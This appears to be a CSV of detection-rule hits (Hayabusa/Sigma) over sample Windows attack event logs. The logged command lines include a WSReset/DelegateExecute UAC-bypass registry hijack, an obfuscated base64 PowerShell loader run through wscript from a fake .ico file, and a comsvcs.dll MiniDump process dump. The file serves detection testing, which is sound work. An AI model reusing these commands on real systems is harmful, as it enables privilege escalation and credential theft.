+2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\system32\reg.exe | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.609 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3fb | PID: 200 | PGUID: 747F3D96-B07F-5D46-0000-001050C80F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 312 000002806444CB40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3952 | PGUID: 747F3D96-B07F-5D46-0000-0010C1CB0F04,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3b3 | PID: 2112 | PGUID: 747F3D96-B080-5D46-0000-0010D4EA0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass WSReset,,rules/sigma/process_creation/proc_creation_win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WSReset.exe"" | LID: 0x18d3b3 | PID: 820 | PGUID: 747F3D96-B091-5D46-0000-001081F71104",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Wsreset UAC Bypass,,rules/sigma/process_creation/proc_creation_win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/proc_creation_win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | LID: 0x18d3b3 | PID: 7792 | PGUID: 747F3D96-B092-5D46-0000-001089041204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.441 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.643 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: {4ED3A719-CEA8-4BD9-910D-E252F997AFC2} | Process: C:\Windows\system32\reg.exe | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-04 19:16:55.712 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x38f87e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
+2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 1052 | PGUID: 747F3D96-F639-5D53-0000-001067DA2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x29126 | PID: 6000 | PGUID: 747F3D96-F639-5D53-0000-001092EE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0x29126 | PID: 8180 | PGUID: 747F3D96-F639-5D53-0000-0010B0FC2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
+2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 2476 | PGUID: 747F3D96-FBCA-5D53-0000-0010B8664100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | LID: 0x29126 | PID: 2876 | PGUID: 747F3D96-FBCA-5D53-0000-001036784100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
+2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
+2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript c:\ProgramData\memdump.vbs notepad.exe | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\cmd.exe | LID: 0xe81e5 | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00 | Hash: SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0xe81e5 | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.396 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\notepad.bin | Process: C:\Windows\system32\rundll32.exe | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-08-30 21:54:08.439 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,CredAccess - Memdump | Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2888 | Src PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00 | Tgt PID: 4868 | Tgt PGUID: 747F3D96-1C5C-5D69-0000-0010FEB71E00,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
+2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx
+2019-09-01 21:04:22.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:445 (MSEDGEWIN10) | Dst: 10.0.2.17:59767 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx
+2019-09-01 21:04:22.908 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:62733 (MSEDGEWIN10) | Dst: 10.0.2.17:445 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx
+2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49947 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49947 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49948 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
+2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
